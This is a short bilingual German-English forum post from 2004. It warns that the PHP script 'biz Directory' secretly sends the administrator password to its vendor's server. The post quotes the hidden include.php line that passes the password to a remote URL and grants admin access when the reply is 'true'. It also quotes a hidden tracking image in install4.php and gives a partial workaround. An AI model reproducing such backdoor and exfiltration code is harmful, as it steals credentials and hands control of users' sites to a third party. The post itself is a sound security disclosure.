biz-directory spioniert admin daten aus !!
Verfasst: 31.07.2004 19:53
WARNUNG: biz Directory sendet das Administrator Passwort an seinen Hersteller!!
ATTENTION: biz Directory sends Administrator Pass Home!!
include.php -- Zeile 60 (nach Rechts scrollen - scroll to the right)
Workaround:
Bitte auch beachten:
Also take a look at:
install4.php Zeile 62
Hier wird mittels hidden.gif eure Seite als REFERER übermittelt !
With a hidden.gif your Site is send via REFERER !
Quelle
Bruno
ATTENTION: biz Directory sends Administrator Pass Home!!
include.php -- Zeile 60 (nach Rechts scrollen - scroll to the right)
Code: Alles auswählen
if ($pass) { $access = fopen ("http://www.directory-search.org/include_variables.php?p=$pass","r"); $access = fread($access,4); if ($access == "true"){ session_start(); $HTTP_SESSION_VARS['admin'] = true; header("Location: {$dir}admin_edit.php"); }; };
Workaround:
Code: Alles auswählen
if ($pass) {
$rand = md5(time());
$access = fopen ("http://www.directory-search.org/include_variables.php?p=$rand","r");
$access = fread($access,4);
if ($access == "true") {
session_start();
$HTTP_SESSION_VARS['admin'] = true;
header("Location: {$dir}admin_edit.php");
};
};
Bitte auch beachten:
Also take a look at:
install4.php Zeile 62
Code: Alles auswählen
<IMG SRC="http://www.directory-search.org/img/invis.gif" WIDTH=1 HEIGHT=1>
Hier wird mittels hidden.gif eure Seite als REFERER übermittelt !
With a hidden.gif your Site is send via REFERER !
Quelle
Bruno